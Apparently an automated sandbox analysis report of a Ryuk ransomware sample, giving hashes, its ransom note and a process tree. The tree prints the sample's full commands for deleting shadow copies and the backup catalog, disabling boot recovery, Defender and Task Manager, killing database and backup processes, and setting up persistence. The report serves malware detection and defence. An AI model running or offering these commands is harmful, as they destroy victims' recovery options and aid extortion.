Analysis

  • max time kernel
    146s
  • max time network
    49s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    10-11-2022 06:20

General

  • Target

    8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

  • Size

    885KB

  • MD5

    a57e1e6fe1c98d2e75799a46e9eb5797

  • SHA1

    7878e7042c355546c118a38b90d8f7221f74d8a4

  • SHA256

    8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

  • SHA512

    5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

  • SSDEEP

    12288:zD7Z7cwy8U9JlpYqWYgeWYg955/155/0QebUlAAsDsKKAosRn6X:z57ctflKgQKUKRDsKKAjN6

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
    "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1468
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1416
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:1776
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:1376
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
        PID:1064
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:296
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
          3⤵
          • Creates scheduled task(s)
          PID:592
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
          3⤵
          • Drops startup file
          • Views/modifies file attributes
          PID:1368
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:464
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F
          3⤵
          • Creates scheduled task(s)
          PID:1136
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1780
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F
          3⤵
          • Creates scheduled task(s)
          PID:288
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\system32\attrib.exe
          attrib +h +s ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:832
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\system32\attrib.exe
          attrib +h +s C:\ProgramData\ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:1556
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1840
        • C:\Windows\system32\cmd.exe
          cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          3⤵
            PID:616
            • C:\Windows\system32\icacls.exe
              icacls * /grant Everyone:(OI)(CI)F /T /C /Q
              4⤵
              • Modifies file permissions
              PID:2004
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1392
          • C:\Windows\system32\cmd.exe
            cmd.exe /c taskkill /t /f /im sql*
            3⤵
              PID:844
              • C:\Windows\system32\taskkill.exe
                taskkill /t /f /im sql*
                4⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1968
            • C:\Windows\system32\taskkill.exe
              taskkill /f /t /im veeam*
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1096
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1100
            • C:\Windows\system32\reg.exe
              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
              3⤵
                PID:984
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
              2⤵
                PID:2040
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
                2⤵
                  PID:1760
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
                  2⤵
                    PID:1012
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
                    2⤵
                      PID:1516
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
                      2⤵
                        PID:1736
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        2⤵
                          PID:1608
                          • C:\Windows\system32\reg.exe
                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                            3⤵
                              PID:1496
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                            2⤵
                              PID:1776
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:1376
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                2⤵
                                  PID:1064
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                    3⤵
                                      PID:332
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                    2⤵
                                      PID:540
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                        3⤵
                                          PID:1700
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
                                        2⤵
                                          PID:1968
                                          • C:\Windows\system32\cmd.exe
                                            cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
                                            3⤵
                                              PID:844
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
                                            2⤵
                                              PID:696
                                              • C:\Windows\system32\cmd.exe
                                                cmd.exe /c vssadmin Delete Shadows /All /Quiet
                                                3⤵
                                                  PID:592
                                                  • C:\Windows\system32\vssadmin.exe
                                                    vssadmin Delete Shadows /All /Quiet
                                                    4⤵
                                                    • Interacts with shadow copies
                                                    PID:1708
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
                                                2⤵
                                                  PID:1404
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd.exe /c wmic shadowcopy delete
                                                    3⤵
                                                      PID:288
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic shadowcopy delete
                                                        4⤵
                                                          PID:1944
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
                                                      2⤵
                                                        PID:840
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
                                                          3⤵
                                                            PID:1620
                                                            • C:\Windows\system32\bcdedit.exe
                                                              bcdedit /set {default} boostatuspolicy ignoreallfailures
                                                              4⤵
                                                              • Modifies boot configuration data using bcdedit
                                                              PID:1420
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
                                                          2⤵
                                                            PID:1612
                                                            • C:\Windows\system32\cmd.exe
                                                              cmd.exe /c bcdedit /set {default} recoveryenabled no
                                                              3⤵
                                                                PID:524
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
                                                              2⤵
                                                                PID:1680
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd.exe /c wbadmin delete catalog -quiet/
                                                                  3⤵
                                                                    PID:1760
                                                                    • C:\Windows\system32\wbadmin.exe
                                                                      wbadmin delete catalog -quiet/
                                                                      4⤵
                                                                      • Deletes backup catalog
                                                                      PID:1728
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c net stop avpsus /y
                                                                  2⤵
                                                                    PID:1112
                                                                    • C:\Windows\system32\net.exe
                                                                      net stop avpsus /y
                                                                      3⤵
                                                                        PID:772
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
                                                                      2⤵
                                                                        PID:1512
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 stop avpsus /y
                                                                      1⤵
                                                                        PID:1164
                                                                      • C:\Windows\system32\vssvc.exe
                                                                        C:\Windows\system32\vssvc.exe
                                                                        1⤵
                                                                          PID:1888
                                                                        • C:\Windows\system32\bcdedit.exe
                                                                          bcdedit /set {default} recoveryenabled no
                                                                          1⤵
                                                                          • Modifies boot configuration data using bcdedit
                                                                          PID:988

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v6

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\ProgramData\RYUKID

                                                                          Filesize

                                                                          8B

                                                                          MD5

                                                                          85a6d10468885323e5dc2549da732a02

                                                                          SHA1

                                                                          60b074142818f87396012ba26b18cf17108210f8

                                                                          SHA256

                                                                          07cf5118df0fde1dc7a5bdbf24ae5390261749c07d0b94672e2b2c088f23057a

                                                                          SHA512

                                                                          4ca41b64f8b91d1fffd6664c35cfab2fed5b6be0511c657efa1bde7ef15883c2d20885e083717c3b41bec651c992615a75621a78c57a375087a52d9328ca0607

                                                                        • C:\ProgramData\RyukReadMe.txt

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          23cb6bce418d720b600fb36625cea4df

                                                                          SHA1

                                                                          8f4018131e41187445688df8cbda01119efff157

                                                                          SHA256

                                                                          4ef805e48ac50fda04eeffff3a725481151dd1dccaf462c02105aa27f630e136

                                                                          SHA512

                                                                          18bd24abd2d55a288933d8b1ce363e5a92703c1c25758ce3d6e52a3b3a25b00d70194fa73520f819afa0080c09866235a22c5c5785ecea2ecd1b5feca36a66b5

                                                                        • C:\ProgramData\hrmlog1

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          4525d98c2b8f6b5d5acfc9857a6ee0a0

                                                                          SHA1

                                                                          e1c4a28a58a0399adaf155e9d064d986160645dd

                                                                          SHA256

                                                                          58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63

                                                                          SHA512

                                                                          5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

                                                                        • C:\ProgramData\hrmlog1

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          4525d98c2b8f6b5d5acfc9857a6ee0a0

                                                                          SHA1

                                                                          e1c4a28a58a0399adaf155e9d064d986160645dd

                                                                          SHA256

                                                                          58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63

                                                                          SHA512

                                                                          5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

                                                                        • C:\ProgramData\hrmlog2

                                                                          Filesize

                                                                          292B

                                                                          MD5

                                                                          15c189b77237ef2f94a84437c8cfc21c

                                                                          SHA1

                                                                          56220c87147712076222f778b1e5e5088db0865d

                                                                          SHA256

                                                                          e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd

                                                                          SHA512

                                                                          7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

                                                                        • C:\ProgramData\hrmlog2

                                                                          Filesize

                                                                          292B

                                                                          MD5

                                                                          15c189b77237ef2f94a84437c8cfc21c

                                                                          SHA1

                                                                          56220c87147712076222f778b1e5e5088db0865d

                                                                          SHA256

                                                                          e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd

                                                                          SHA512

                                                                          7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

                                                                        • C:\ProgramData\ryuk.exe

                                                                          Filesize

                                                                          885KB

                                                                          MD5

                                                                          a57e1e6fe1c98d2e75799a46e9eb5797

                                                                          SHA1

                                                                          7878e7042c355546c118a38b90d8f7221f74d8a4

                                                                          SHA256

                                                                          8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

                                                                          SHA512

                                                                          5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

                                                                        • C:\Users\Admin\AppData\Local\Temp\RYUKID

                                                                          Filesize

                                                                          8B

                                                                          MD5

                                                                          85a6d10468885323e5dc2549da732a02

                                                                          SHA1

                                                                          60b074142818f87396012ba26b18cf17108210f8

                                                                          SHA256

                                                                          07cf5118df0fde1dc7a5bdbf24ae5390261749c07d0b94672e2b2c088f23057a

                                                                          SHA512

                                                                          4ca41b64f8b91d1fffd6664c35cfab2fed5b6be0511c657efa1bde7ef15883c2d20885e083717c3b41bec651c992615a75621a78c57a375087a52d9328ca0607

                                                                        • C:\Users\Admin\AppData\Local\Temp\hrmlog1

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          4525d98c2b8f6b5d5acfc9857a6ee0a0

                                                                          SHA1

                                                                          e1c4a28a58a0399adaf155e9d064d986160645dd

                                                                          SHA256

                                                                          58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63

                                                                          SHA512

                                                                          5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

                                                                        • C:\Users\Admin\AppData\Local\Temp\hrmlog2

                                                                          Filesize

                                                                          292B

                                                                          MD5

                                                                          15c189b77237ef2f94a84437c8cfc21c

                                                                          SHA1

                                                                          56220c87147712076222f778b1e5e5088db0865d

                                                                          SHA256

                                                                          e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd

                                                                          SHA512

                                                                          7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

                                                                          Filesize

                                                                          885KB

                                                                          MD5

                                                                          a57e1e6fe1c98d2e75799a46e9eb5797

                                                                          SHA1

                                                                          7878e7042c355546c118a38b90d8f7221f74d8a4

                                                                          SHA256

                                                                          8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

                                                                          SHA512

                                                                          5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

                                                                        • memory/288-110-0x0000000000000000-mapping.dmp

                                                                        • memory/288-67-0x0000000000000000-mapping.dmp

                                                                        • memory/296-59-0x0000000000000000-mapping.dmp

                                                                        • memory/332-100-0x0000000000000000-mapping.dmp

                                                                        • memory/464-64-0x0000000000000000-mapping.dmp

                                                                        • memory/524-117-0x0000000000000000-mapping.dmp

                                                                        • memory/540-101-0x0000000000000000-mapping.dmp

                                                                        • memory/592-107-0x0000000000000000-mapping.dmp

                                                                        • memory/592-60-0x0000000000000000-mapping.dmp

                                                                        • memory/616-73-0x0000000000000000-mapping.dmp

                                                                        • memory/696-106-0x0000000000000000-mapping.dmp

                                                                        • memory/772-122-0x0000000000000000-mapping.dmp

                                                                        • memory/832-69-0x0000000000000000-mapping.dmp

                                                                        • memory/840-112-0x0000000000000000-mapping.dmp

                                                                        • memory/844-105-0x0000000000000000-mapping.dmp

                                                                        • memory/844-77-0x0000000000000000-mapping.dmp

                                                                        • memory/984-76-0x0000000000000000-mapping.dmp

                                                                        • memory/988-123-0x0000000000000000-mapping.dmp

                                                                        • memory/1012-87-0x0000000000000000-mapping.dmp

                                                                        • memory/1064-99-0x0000000000000000-mapping.dmp

                                                                        • memory/1064-58-0x0000000000000000-mapping.dmp

                                                                        • memory/1096-79-0x0000000000000000-mapping.dmp

                                                                        • memory/1100-74-0x0000000000000000-mapping.dmp

                                                                        • memory/1112-121-0x0000000000000000-mapping.dmp

                                                                        • memory/1136-65-0x0000000000000000-mapping.dmp

                                                                        • memory/1164-124-0x0000000000000000-mapping.dmp

                                                                        • memory/1368-62-0x0000000000000000-mapping.dmp

                                                                        • memory/1376-56-0x0000000000000000-mapping.dmp

                                                                        • memory/1376-98-0x0000000000000000-mapping.dmp

                                                                        • memory/1392-75-0x0000000000000000-mapping.dmp

                                                                        • memory/1404-108-0x0000000000000000-mapping.dmp

                                                                        • memory/1416-54-0x0000000000000000-mapping.dmp

                                                                        • memory/1420-119-0x0000000000000000-mapping.dmp

                                                                        • memory/1468-103-0x000007FEFC5A1000-0x000007FEFC5A3000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1496-96-0x0000000000000000-mapping.dmp

                                                                        • memory/1516-91-0x0000000000000000-mapping.dmp

                                                                        • memory/1556-71-0x0000000000000000-mapping.dmp

                                                                        • memory/1608-95-0x0000000000000000-mapping.dmp

                                                                        • memory/1612-114-0x0000000000000000-mapping.dmp

                                                                        • memory/1620-113-0x0000000000000000-mapping.dmp

                                                                        • memory/1672-70-0x0000000000000000-mapping.dmp

                                                                        • memory/1680-118-0x0000000000000000-mapping.dmp

                                                                        • memory/1700-102-0x0000000000000000-mapping.dmp

                                                                        • memory/1708-116-0x0000000000000000-mapping.dmp

                                                                        • memory/1728-125-0x0000000000000000-mapping.dmp

                                                                        • memory/1736-93-0x0000000000000000-mapping.dmp

                                                                        • memory/1760-120-0x0000000000000000-mapping.dmp

                                                                        • memory/1760-83-0x0000000000000000-mapping.dmp

                                                                        • memory/1776-97-0x0000000000000000-mapping.dmp

                                                                        • memory/1776-55-0x0000000000000000-mapping.dmp

                                                                        • memory/1780-66-0x0000000000000000-mapping.dmp

                                                                        • memory/1840-72-0x0000000000000000-mapping.dmp

                                                                        • memory/1924-68-0x0000000000000000-mapping.dmp

                                                                        • memory/1936-61-0x0000000000000000-mapping.dmp

                                                                        • memory/1944-115-0x0000000000000000-mapping.dmp

                                                                        • memory/1968-84-0x0000000000000000-mapping.dmp

                                                                        • memory/1968-104-0x0000000000000000-mapping.dmp

                                                                        • memory/2004-78-0x0000000000000000-mapping.dmp

                                                                        • memory/2040-80-0x0000000000000000-mapping.dmp